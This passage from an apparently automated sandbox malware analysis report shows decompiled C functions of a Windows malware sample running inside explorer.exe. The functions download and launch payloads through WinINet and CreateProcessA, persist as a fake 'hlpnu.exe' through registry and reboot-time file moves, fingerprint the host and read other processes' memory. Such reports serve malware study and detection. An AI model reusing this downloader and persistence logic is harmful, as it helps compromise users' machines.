      • Part of subcall function 007741CC: FreeSid.ADVAPI32(?), ref: 007742BE
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 100%
    			E007782F4(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v541;
    				char _v1054;
    				struct _STARTUPINFOA _v1124;
    				struct _PROCESS_INFORMATION _v1140;
    				intOrPtr* _t36;
    				intOrPtr _t42;
    				intOrPtr _t58;
    				intOrPtr _t63;
    				intOrPtr _t67;
    				intOrPtr _t78;
    
    				_t36 = __eax -  *__eax;
    				 *_t36 =  *_t36 + _t36;
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = _t36;
    				_v20 = 0;
    				_v24 = E00777CFC(_v12);
    				E00771258( &_v1124, 0x44);
    				_v1124.cb = 0x44;
    				if(_v24 == 0) {
    					_t42 =  *0x77a168; // 0x771dec
    					E00777290(_t42);
    				} else {
    					_v28 = E00771110(_v8, 0x778494);
    					_t102 = _v28;
    					if(_v28 != 0) {
    						GetTempPathA(0x201,  &_v1054);
    						E00777560( &_v1054, 0x778494, _t102);
    						E00771308( &_v541, 0x77849c);
    						E0077133C( &_v541,  &_v1054);
    						E0077133C( &_v541, 0x77849c);
    						_t58 =  *0x77a0a8; // 0x771c4c
    						E0077133C( &_v541, _t58);
    						if( *((char*)(_v28 + 4)) != 0x31) {
    							 *0x77b514 = 0;
    							_t63 =  *0x77b510; // 0x790000
    							E00771828(_t63);
    							E007713B4(0x77b510, _v16);
    							_t67 =  *0x77b510; // 0x790000
    							E007712B8(_t67, _v16, _v12);
    							 *0x77b514 = _v16;
    							 *0x77be1c = 0;
    							wsprintfA("1530474054", 0x7784a0, _v24);
    						} else {
    							E0077485C( &_v1054, _v16, _v12);
    							Sleep(0x5dc);
    							if(CreateProcessA(0,  &_v541, 0, 0, 0, 0, 0, 0,  &_v1124,  &_v1140) == 0) {
    								_t78 =  *0x77a174; // 0x771e10
    								E00777290(_t78);
    							} else {
    								_v20 = 0xffffffff;
    							}
    						}
    					}
    				}
    				return _v20;
    			}

    0x007782f4
    0x007782f6
    0x00778301
    0x00778304
    0x00778307
    0x0077830c
    0x00778317
    0x00778325
    0x0077832a
    0x00778338
    0x00778481
    0x00778486
    0x0077833e
    0x0077834b
    0x0077834e
    0x00778352
    0x00778364
    0x00778370
    0x00778380
    0x00778393
    0x007783a7
    0x007783af
    0x007783bc
    0x007783cb
    0x0077842d
    0x00778432
    0x00778437
    0x00778444
    0x0077844f
    0x00778454
    0x0077845c
    0x00778461
    0x00778476
    0x007783cd
    0x007783d9
    0x007783e3
    0x00778414
    0x0077841f
    0x00778424
    0x00778416
    0x00778416
    0x00778416
    0x00778414
    0x007783cb
    0x00778352
    0x00778491

    APIs
      • Part of subcall function 00777290: CreateThread.KERNEL32(00000000,00000000,Function_00007278,?,00000000,?), ref: 007772AC
      • Part of subcall function 00777290: CloseHandle.KERNEL32(?), ref: 007772B9
      • Part of subcall function 00771828: VirtualFree.KERNEL32(?,00000000,00008000,?,?,00776A2F), ref: 0077183A
      • Part of subcall function 007713B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 007713CD
    • GetTempPathA.KERNEL32(00000201,?), ref: 00778364
    • wsprintfA.USER32 ref: 00778476
      • Part of subcall function 0077485C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00774886
      • Part of subcall function 0077485C: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 007748A7
      • Part of subcall function 0077485C: FlushFileBuffers.KERNEL32(000000FF), ref: 007748C4
      • Part of subcall function 0077485C: CloseHandle.KERNEL32(000000FF), ref: 007748CE
    • Sleep.KERNEL32(000005DC), ref: 007783E3
    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0077840C
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 78%
    			E00779230(intOrPtr* __ebx, intOrPtr* __ecx) {
    				void* _t11;
    				int _t12;
    				CHAR* _t14;
    				void* _t22;
    				intOrPtr _t24;
    				void* _t25;
    
    				if( *__ecx() != 0) {
    					_push(0);
    					 *__ebx();
    				}
    				_pop(_t22);
    				_pop(_t19);
    				_t24 =  *0x77a0a8; // 0x771c4c
    				_t11 = E00771110( *((intOrPtr*)(_t25 - 4)), _t24);
    				_t29 = _t11;
    				if(_t11 == 0) {
    					 *((char*)(_t25 - 0x116)) = 0x2d;
    				} else {
    					 *((char*)(_t25 - 0x116)) = 0x2b;
    					Sleep(0x3a98);
    				}
    				_t12 = E00776E04(_t22, _t29);
    				if(_t12 == 0) {
    					if( *((char*)(_t25 - 0x116)) != 0x2d) {
    						L9:
    						_push(_t12);
    						_push(_t22);
    						_t12 = E007769BC(_t24, _t32) + E007792CD;
    						goto __eax;
    					}
    					_t14 =  *0x77a0d8; // 0x771cc8
    					_t12 = OpenMutexA(0x100000, 0, _t14);
    					 *(_t25 - 8) = _t12;
    					_t32 =  *(_t25 - 8);
    					if( *(_t25 - 8) == 0) {
    						goto L9;
    					}
    					_t12 = CloseHandle( *(_t25 - 8));
    					ExitProcess(0);
    				}
    				return _t12;
    			}

    0x00779235
    0x00779237
    0x00779239
    0x0077923b
    0x0077923f
    0x00779240
    0x00779242
    0x0077924b
    0x00779250
    0x00779252
    0x00779268
    0x00779254
    0x00779254
    0x00779260
    0x00779260
    0x0077926f
    0x00779276
    0x00779283
    0x007792b3
    0x007792b3
    0x007792b5
    0x007792bb
    0x007792cb
    0x007792cb
    0x00779285
    0x00779292
    0x00779298
    0x0077929b
    0x0077929f
    0x00000000
    0x00000000
    0x007792a5
    0x007792ad
    0x007792ad
    0x00779464

    APIs
    • Sleep.KERNEL32(00003A98), ref: 00779260
      • Part of subcall function 00776E04: GetModuleFileNameA.KERNEL32(00000000,?,000001F5), ref: 00776E26
      • Part of subcall function 00776E04: CharUpperBuffA.USER32(?,000001F5), ref: 00776E37
    • OpenMutexA.KERNEL32(00100000,00000000,00771CC8), ref: 00779292
    • CloseHandle.KERNEL32(00000000), ref: 007792A5
    • ExitProcess.KERNEL32 ref: 007792AD
      • Part of subcall function 007769BC: GetTempPathA.KERNEL32(00000101,?), ref: 007769E1
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 28%
    			E00778258(char* __eax) {
    				char* _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				signed int _v20;
    				char _v84;
    				char _v484;
    				intOrPtr _t31;
    				void* _t46;
    
    				_v8 = __eax;
    				 *_v8 = 0;
    				 *0x77b3c0(0x101,  &_v484);
    				gethostname( &_v84, 0x40);
    				_t31 =  *0x77b3e0( &_v84);
    				_v12 = _t31;
    				if(_v12 != 0) {
    					_v16 =  *((intOrPtr*)(_v12 + 0xc));
    					_v20 = 0;
    					while( *((intOrPtr*)(_v16 + _v20 * 4)) != 0) {
    						E0077133C(_v8,  *0x77b344( *((intOrPtr*)( *((intOrPtr*)(_v16 + _v20 * 4))))));
    						E0077133C(_v8, E007782F4);
    						_t46 = _t46 + 0x10;
    						_v20 = _v20 + 1;
    					}
    					return  *0x77b3d8();
    				}
    				return _t31;
    			}

    0x00778261
    0x00778267
    0x00778276
    0x00778282
    0x0077828c
    0x00778292
    0x00778299
    0x007782a1
    0x007782a6
    0x007782dd
    0x007782c1
    0x007782d2
    0x007782d7
    0x007782da
    0x007782da
    0x00000000
    0x007782e9
    0x007782f2

    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 98%
    			E00773C28(intOrPtr __eax, void* __ecx, CHAR* __edx) {
    				intOrPtr _v8;
    				CHAR* _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				long _v32;
    				char _v36;
    				char _v40;
    				intOrPtr _v44;
    				long _v48;
    				void* _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				signed char _v68;
    				signed int _v72;
    				char _v201;
    				char _v458;
    				void _v1483;
    				signed int _t88;
    				intOrPtr _t93;
    				void* _t94;
    				intOrPtr _t162;
    				intOrPtr _t165;
    				void* _t175;
    				void* _t180;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = 0;
    				_t176 =  *0x77b7a4;
    				if( *0x77b7a4 == 0) {
    					E00773A04(_t176);
    				}
    				_t162 =  *0x77a1a4; // 0x771ec0
    				_t88 = E00771110(_v8, _t162);
    				asm("sbb eax, eax");
    				_v68 =  ~(_t88 & 0xffffff00 | _t88 == _v8);
    				_v56 = E00771110(_v8, E00773E98);
    				if(_v56 != 0) {
    					_v56 = _v56 + 2;
    					_v60 = E00771110(_v56, 0x773e9c);
    					_v32 = _v60 - _v56;
    					E007712B8( &_v201, _v32, _v56);
    					 *((char*)(_t175 + _v32 - 0xc5)) = 0;
    					E00771308( &_v458, _v60);
    				}
    				_t93 =  *0x77a298; // 0x0
    				_t94 = _t93 - 1;
    				_t180 = _t94;
    				if(_t180 < 0) {
    					_v64 = 0;
    				} else {
    					if(_t180 == 0) {
    						_v64 = 0;
    					} else {
    						if(_t94 == 1) {
    							_v64 = 1;
    						}
    					}
    				}
    				_v20 = E00773864(0x77b7a4, _v64, 0, 0, 0);
    				if(_v68 == 0) {
    					_v72 = 0x50;
    				} else {
    					_v72 = 0x1bb;
    				}
    				_v24 = E0077161C(_v20, _v72,  &_v201, 0, 0, 3, 0, 0);
    				if(_v68 == 0) {
    					_v72 = 0x4400000;
    				} else {
    					_v72 = 0x4c03000;
    				}
    				_t165 =  *0x77a244; // 0x7720b8
    				_v28 = E00771660(_v24,  &_v458, _t165, 0, _v72, 0, 0, 0);
    				if(_v68 != 0) {
    					_v32 = 4;
    					E007716D8(_v28,  &_v72, 0x1f,  &_v32);
    					_v72 = _v72 | 0x00000100;
    					E0077170C(_v28,  &_v72, 0x1f, 4);
    				}
    				E007715E4(_v28, 0, 0, 0, 0);
    				_v32 = 4;
    				_v36 = 0;
    				_v40 = 0;
    				E007739CC(_v28,  &_v36, 0x20000013,  &_v40,  &_v32);
    				if(_v36 != 0xc8) {
    					L24:
    					E0077151C(_v28);
    					E0077151C(_v24);
    					E0077151C(_v20);
    					return _v16;
    				} else {
    					_v52 = CreateFileA(_v12, 0x40000000, 0, 0, 2, 0x80, 0);
    					if(_v52 == 0xffffffff) {
    						goto L24;
    					} else {
    						goto L21;
    					}
    					do {
    						L21:
    						_v44 = E007716A4(_v28, 0,  &_v32, 0);
    						E007715B0(_v28, 0x401,  &_v1483,  &_v32);
    						WriteFile(_v52,  &_v1483, _v32,  &_v48, 0);
    					} while (_v32 != 0 || _v44 == 0);
    					CloseHandle(_v52);
    					_v16 = 0xffffffff;
    					goto L24;
    				}
    			}

    0x00773c31
    0x00773c34
    0x00773c39
    0x00773c3c
    0x00773c43
    0x00773c45
    0x00773c45
    0x00773c4a
    0x00773c53
    0x00773c60
    0x00773c62
    0x00773c72
    0x00773c79
    0x00773c81
    0x00773c91
    0x00773c9a
    0x00773ca9
    0x00773cb1
    0x00773cc2
    0x00773cc2
    0x00773cc7
    0x00773ccc
    0x00773ccc
    0x00773ccf
    0x00773cda
    0x00773cd1
    0x00773cd1
    0x00773ce1
    0x00773cd3
    0x00773cd4
    0x00773ce6
    0x00773ce6
    0x00773cd4
    0x00773cd1
    0x00773d01
    0x00773d08
    0x00773d13
    0x00773d0a
    0x00773d0a
    0x00773d0a
    0x00773d36
    0x00773d3d
    0x00773d48
    0x00773d3f
    0x00773d3f
    0x00773d3f
    0x00773d61
    0x00773d6f
    0x00773d76
    0x00773d78
    0x00773d8e
    0x00773d93
    0x00773da7
    0x00773da7
    0x00773db7
    0x00773dbc
    0x00773dc5
    0x00773dca
    0x00773de0
    0x00773dec
    0x00773e78
    0x00773e7b
    0x00773e83
    0x00773e8b
    0x00773e96
    0x00773df2
    0x00773e0e
    0x00773e15
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00773e17
    0x00773e17
    0x00773e26
    0x00773e3b
    0x00773e55
    0x00773e5b
    0x00773e6b
    0x00773e71
    0x00000000
    0x00773e71

    APIs
      • Part of subcall function 00773864: InternetOpenA.WININET(?,?,?,?,?), ref: 0077387C
      • Part of subcall function 0077161C: InternetConnectA.WININET(?,?,?,?,?,?,?,?), ref: 0077164D
      • Part of subcall function 00771660: HttpOpenRequestA.WININET(?,?,?,?,?,?,?,?), ref: 0077168F
      • Part of subcall function 007715E4: HttpSendRequestA.WININET(?,?,?,?,?), ref: 00771607
      • Part of subcall function 007739CC: HttpQueryInfoA.WININET(?,?,?,?,?), ref: 007739EF
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00773E08
      • Part of subcall function 007716A4: InternetQueryDataAvailable.WININET(?,?,?,?), ref: 007716C3
      • Part of subcall function 007715B0: InternetReadFile.WININET(?,?,?,?), ref: 007715CF
    • WriteFile.KERNEL32(000000FF,?,00000004,?,00000000), ref: 00773E55
    • CloseHandle.KERNEL32(000000FF), ref: 00773E6B
      • Part of subcall function 0077151C: InternetCloseHandle.WININET(?), ref: 00771529
      • Part of subcall function 007716D8: InternetQueryOptionA.WININET(?,?,?,?), ref: 007716F7
      • Part of subcall function 0077170C: InternetSetOptionA.WININET(?,?,?,?), ref: 0077172B
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 93%
    			E007776A0(int __eax, void* __ebx) {
    				int _v8;
    				char* _v12;
    				char* _v16;
    				char _v273;
    				char _v530;
    				void* __ebp;
    				int _t38;
    				signed int _t46;
    				signed int _t50;
    				signed int _t57;
    				intOrPtr _t92;
    				intOrPtr _t97;
    				intOrPtr _t99;
    				intOrPtr _t100;
    				intOrPtr _t102;
    				intOrPtr _t104;
    				intOrPtr _t108;
    				intOrPtr _t109;
    				void* _t111;
    				void* _t112;
    				void* _t113;
    
    				_t38 = __eax;
    				_v8 = __eax;
    				if( *0x77b514 > 0 &&  *0x77b510 != 0) {
    					E00771308( &_v530, 0x77b518);
    					 *((char*)(_t111 + E007712DC(0x77b518) - 0x212)) = 0;
    					E0077133C( &_v530, ".lnk");
    					_t113 = _t112 + 8;
    					_t96 =  &_v530;
    					_t102 =  *0x77a0ac; // 0x771c58
    					_t46 = E00773FC8(0x77b518, __ebx,  &_v530, _t102);
    					asm("sbb eax, eax");
    					if( ~( ~_t46) == 0) {
    						E00771308( &_v530, 0x7778ec);
    						E0077133C( &_v530, "C:\Program Files\Windows NT\hlpnu.exe");
    						E0077133C( &_v530, 0x7778f0);
    						_t92 =  *0x77a0ac; // 0x771c58
    						E0077133C( &_v530, _t92);
    						_t113 = _t113 + 0x18;
    					}
    					if( *0x77a034 == 0) {
    						_t50 = E00774968(0x80000001, _t96,  &_v530);
    						asm("sbb eax, eax");
    						_t38 =  ~( ~_t50);
    						if(_t38 != 0 &&  *0x77b514 > 0 &&  *0x77b510 != 0) {
    							_t97 =  *0x77b514; // 0x4e600
    							_t104 =  *0x77b510; // 0x790000
    							E0077485C(0x77b518, _t97, _t104);
    							return E0077763C(0x77b518);
    						}
    					} else {
    						_t57 = E00774968(0x80000002, _t96,  &_v530);
    						asm("sbb eax, eax");
    						_t38 =  ~( ~_t57);
    						if(_t38 != 0) {
    							if(_v8 != 0) {
    								_t100 =  *0x77b514; // 0x4e600
    								_t109 =  *0x77b510; // 0x790000
    								E0077485C(0x77b518, _t100, _t109);
    								return E0077763C(0x77b518);
    							}
    							E00771308( &_v273, 0x77b518);
    							_v12 =  &_v273;
    							_v16 = 0;
    							while( *_v12 != 0) {
    								if( *_v12 == 0x5c) {
    									_v16 = _v12;
    								}
    								_v12 = _v12 + 1;
    							}
    							if(_v16 == 0) {
    								_v16 =  &_v273;
    							} else {
    								_v16 = _v16 + 1;
    							}
    							 *_v16 = 0;
    							_v12 = E00773B80(9, 0x19, 0x14);
    							E0077133C(_v16, _v12);
    							E00771440(_v12);
    							E0077133C(_v16, ".txt");
    							_t38 = MoveFileExA( &_v273, "C:\Program Files\Windows NT\hlpnu.exe", 4);
    							if( *0x77b514 > 0 &&  *0x77b510 != 0) {
    								_t99 =  *0x77b514; // 0x4e600
    								_t108 =  *0x77b510; // 0x790000
    								E0077485C( &_v273, _t99, _t108);
    								return E0077763C( &_v273);
    							}
    						}
    					}
    				}
    				return _t38;
    			}

    0x007776a0
    0x007776a9
    0x007776b3
    0x007776d1
    0x007776e0
    0x007776f4
    0x007776f9
    0x007776fc
    0x00777707
    0x0077770d
    0x00777714
    0x0077771a
    0x00777727
    0x00777738
    0x0077774c
    0x00777754
    0x00777761
    0x00777766
    0x00777766
    0x00777770
    0x0077789e
    0x007778a5
    0x007778a7
    0x007778ab
    0x007778c4
    0x007778ca
    0x007778d0
    0x00000000
    0x007778da
    0x00777776
    0x00777781
    0x00777788
    0x0077778a
    0x0077778e
    0x00777798
    0x0077779f
    0x007777a5
    0x007777ab
    0x00000000
    0x007777b5
    0x007777ca
    0x007777d5
    0x007777da
    0x007777f0
    0x007777e5
    0x007777ea
    0x007777ea
    0x007777ed
    0x007777ed
    0x007777fc
    0x00777809
    0x007777fe
    0x007777fe
    0x007777fe
    0x0077780f
    0x0077781d
    0x00777828
    0x00777833
    0x00777841
    0x00777857
    0x00777864
    0x00777875
    0x0077787b
    0x00777881
    0x00000000
    0x0077788c
    0x00777864
    0x0077778e
    0x00777770
    0x007778e2

    APIs
      • Part of subcall function 00773FC8: CoInitialize.OLE32(00000000), ref: 00774001
      • Part of subcall function 00773FC8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00774089
      • Part of subcall function 00773FC8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 007740A7
      • Part of subcall function 00771440: GetProcessHeap.KERNEL32(00000000,?), ref: 0077144D
      • Part of subcall function 00771440: HeapFree.KERNEL32(00000000), ref: 00771454
    • MoveFileExA.KERNEL32(?,C:\Program Files\Windows NT\hlpnu.exe,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00777857
      • Part of subcall function 00774968: SHGetValueA.SHLWAPI(?,00771DAC,?,00000001,00000000,?), ref: 007749B1
      • Part of subcall function 00774968: RegOpenKeyExA.ADVAPI32(?,00771DAC,00000000,000F003F,?), ref: 007749D0
      • Part of subcall function 0077485C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00774886
      • Part of subcall function 0077485C: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 007748A7
      • Part of subcall function 0077485C: FlushFileBuffers.KERNEL32(000000FF), ref: 007748C4
      • Part of subcall function 0077485C: CloseHandle.KERNEL32(000000FF), ref: 007748CE
      • Part of subcall function 0077763C: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00777658
      • Part of subcall function 0077763C: GetFileSize.KERNEL32(000000FF,00000000), ref: 0077766D
      • Part of subcall function 0077763C: CloseHandle.KERNEL32(000000FF), ref: 0077768A
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 100%
    			E007764BC(char* __eax, char __edx, void* __eflags) {
    				char* _v8;
    				char _v9;
    				struct _OSVERSIONINFOA _v168;
    				char _v233;
    				intOrPtr _t68;
    
    				_v9 = __edx;
    				_v8 = __eax;
    				E00771258(_v8, 0x51);
    				 *_v8 = _v9;
    				E007712B8(_v8 + 0x10, 0x12, 0x77b719);
    				E007712B8(_v8 + 1, E007712DC(0x77b794), 0x77b794);
    				E00771258( &_v168, 0x9c);
    				_v168.dwOSVersionInfoSize = 0x9c;
    				GetVersionExA( &_v168);
    				E00771864(_v168.dwMajorVersion,  &_v233);
    				 *((char*)(_v8 + 0x22)) = _v233;
    				 *((char*)(_v8 + 0x23)) = 0x2e;
    				E00771864(_v168.dwMinorVersion,  &_v233);
    				 *((char*)(_v8 + 0x24)) = _v233;
    				_t68 =  *0x77a068; // 0x3
    				E00771864(_t68,  &_v233);
    				 *((char*)(_v8 + 0x26)) = _v233;
    				if( *0x77a058 == 0) {
    					 *((char*)(_v8 + 0x27)) = 0x30;
    				} else {
    					 *((char*)(_v8 + 0x27)) = 0x31;
    				}
    				if( *0x77a034 == 0) {
    					 *((char*)(_v8 + 0x28)) = 0x30;
    				} else {
    					 *((char*)(_v8 + 0x28)) = 0x31;
    				}
    				if(E00773EA0() == 0) {
    					 *((char*)(_v8 + 0x25)) = 0x30;
    				} else {
    					 *((char*)(_v8 + 0x25)) = 0x31;
    				}
    				 *((intOrPtr*)(_v8 + 0x29)) = E00775468();
    				return E00771308(_v8 + 0x2d, 0x77b00c);
    			}

    0x007764c5
    0x007764c8
    0x007764d3
    0x007764de
    0x007764f0
    0x0077650a
    0x0077651a
    0x0077651f
    0x00776530
    0x00776544
    0x00776555
    0x0077655b
    0x0077656d
    0x0077657e
    0x00776588
    0x0077658e
    0x0077659f
    0x007765a9
    0x007765b7
    0x007765ab
    0x007765ae
    0x007765ae
    0x007765c2
    0x007765d0
    0x007765c4
    0x007765c7
    0x007765c7
    0x007765db
    0x007765e9
    0x007765dd
    0x007765e0
    0x007765e0
    0x007765f5
    0x0077660b

    APIs
    • GetVersionExA.KERNEL32(0000009C), ref: 00776530
      • Part of subcall function 00771864: wsprintfA.USER32 ref: 00771874
      • Part of subcall function 00773EA0: RegCreateKeyExA.ADVAPI32(80000002,007721A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00773ECD
      • Part of subcall function 00773EA0: RegCreateKeyExA.ADVAPI32(80000001,007721A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00773EF3
      • Part of subcall function 00775468: GetSystemTime.KERNEL32(?), ref: 00775472
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 35%
    			E007792CD() {
    				void* _t3;
    				intOrPtr _t11;
    				intOrPtr* _t18;
    				intOrPtr* _t21;
    				void* _t24;
    				void* _t25;
    
    				_t3 =  *_t21();
    				_t28 = _t3;
    				if(_t3 != 0) {
    					 *_t18(0);
    				}
    				_pop(_t22);
    				_pop(_t19);
    				GetModuleFileNameA(0, _t25 - 0x117 + 2, 0x103);
    				 *0x77a06c = E00777C50(_t25 - 0x117 + 2);
    				_t11 =  *0x77a06c; // 0x5b392e46
    				wsprintfA("1530474054", E00779468, _t11);
    				_push(GetCursorPos(0x77a578));
    				E007769BC(_t24, _t28);
    				goto __eax;
    			}

    0x007792cd
    0x007792cf
    0x007792d2
    0x007792d6
    0x007792d8
    0x007792dc
    0x007792dd
    0x007792f0
    0x00779304
    0x00779309
    0x00779319
    0x0077932d
    0x00779330
    0x00779345

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000103), ref: 007792F0
      • Part of subcall function 00777C50: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00777C71
      • Part of subcall function 00777C50: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00777C93
      • Part of subcall function 00777C50: ReadFile.KERNEL32(000000FF,?,00000040,?,00000000), ref: 00777CB2
      • Part of subcall function 00777C50: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000), ref: 00777CC7
      • Part of subcall function 00777C50: ReadFile.KERNEL32(000000FF,?,00000014,?,00000000), ref: 00777CDD
      • Part of subcall function 00777C50: CloseHandle.KERNEL32(000000FF), ref: 00777CE7
    • wsprintfA.USER32 ref: 00779319
    • GetCursorPos.USER32(0077A578), ref: 00779327
      • Part of subcall function 007769BC: GetTempPathA.KERNEL32(00000101,?), ref: 007769E1
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 82%
    			E00774EF0(void* __eax, void* __eflags) {
    				void* _v8;
    				void _v12;
    				void* _v16;
    				void _v20;
    				void _v24;
    				void* _v28;
    				void* _v32;
    				long _v36;
    				intOrPtr* _v40;
    				void* _v52;
    				void _v64;
    				signed int _t63;
    				signed int _t72;
    				signed int _t88;
    				signed int _t96;
    
    				_v8 = __eax;
    				_v24 = 0;
    				_v12 = 0;
    				_v28 = E007713DC(0x1000);
    				_v32 = E00774E94(_v8);
    				if(_v32 != 0) {
    					_t63 = ReadProcessMemory(_v8, _v32, _v28, 0x1000,  &_v36);
    					asm("sbb eax, eax");
    					if( ~( ~_t63) != 0) {
    						_t72 = ReadProcessMemory(_v8,  *((intOrPtr*)(_v28 + 0x3c)) + _v32, _v28, 0x1000,  &_v36);
    						asm("sbb eax, eax");
    						if( ~( ~_t72) != 0) {
    							_v24 =  *((intOrPtr*)(_v28 + 0x28)) + _v32;
    							_v40 = _v28 + 0xc0;
    							if( *_v40 != 0 &&  *((intOrPtr*)(_v40 + 4)) != 0) {
    								_t88 = ReadProcessMemory(_v8,  *_v40 + _v32,  &_v64, 0x18,  &_v36);
    								asm("sbb eax, eax");
    								if( ~( ~_t88) != 0) {
    									_v16 = _v52;
    									if(_v16 != 0) {
    										_t96 = ReadProcessMemory(_v8, _v16, _v28, 0x1000,  &_v36);
    										asm("sbb eax, eax");
    										if( ~( ~_t96) != 0) {
    											_v20 =  *_v28;
    											if(_v20 != 0) {
    												_v24 = _v20;
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    				E00771440(_v28);
    				_v12 = _v24;
    				return _v12;
    			}

    0x00774ef6
    0x00774efb
    0x00774f00
    0x00774f0d
    0x00774f18
    0x00774f1f
    0x00774f3a
    0x00774f42
    0x00774f48
    0x00774f69
    0x00774f71
    0x00774f77
    0x00774f86
    0x00774f91
    0x00774f9a
    0x00774fbc
    0x00774fc4
    0x00774fca
    0x00774fcf
    0x00774fd6
    0x00774fed
    0x00774ff5
    0x00774ffb
    0x00775002
    0x00775009
    0x0077500e
    0x0077500e
    0x00775009
    0x00774ffb
    0x00774fd6
    0x00774fca
    0x00774f9a
    0x00774f77
    0x00774f48
    0x00775014
    0x0077501c
    0x00775025

    APIs
      • Part of subcall function 007713DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007713EB
      • Part of subcall function 007713DC: RtlAllocateHeap.NTDLL(00000000), ref: 007713F2
      • Part of subcall function 00774E94: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 00774EAD
      • Part of subcall function 00774E94: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00774EDD
    • ReadProcessMemory.KERNEL32(?,00000000,?,00001000,?), ref: 00774F3A
    • ReadProcessMemory.KERNEL32(?,00000000,?,00001000,?), ref: 00774F69
    • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000018,?), ref: 00774FBC
    • ReadProcessMemory.KERNEL32(00000000,00000000,?,00001000,?), ref: 00774FED
      • Part of subcall function 00771440: GetProcessHeap.KERNEL32(00000000,?), ref: 0077144D
      • Part of subcall function 00771440: HeapFree.KERNEL32(00000000), ref: 00771454
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 100%
    			E0077485C(CHAR* __eax, long __ecx, void* __edx) {
    				CHAR* _v8;
    				void* _v12;
    				long _v16;
    				intOrPtr _v20;
    				void* _v24;
    				long _v28;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				_v20 = 0;
    				_v24 = CreateFileA(_v8, 0x40000000, 0, 0, 2, 0x80, 0);
    				if(_v24 != 0xffffffff) {
    					if(WriteFile(_v24, _v12, _v16,  &_v28, 0) != 0 && _v28 == _v16) {
    						_v20 = 0xffffffff;
    					}
    					FlushFileBuffers(_v24);
    					CloseHandle(_v24);
    				}
    				return _v20;
    			}

    0x00774862
    0x00774865
    0x00774868
    0x0077486d
    0x0077488c
    0x00774893
    0x007748af
    0x007748b9
    0x007748b9
    0x007748c4
    0x007748ce
    0x007748ce
    0x007748da

    APIs
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00774886
    • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 007748A7
    • FlushFileBuffers.KERNEL32(000000FF), ref: 007748C4
    • CloseHandle.KERNEL32(000000FF), ref: 007748CE
    Memory Dump Source
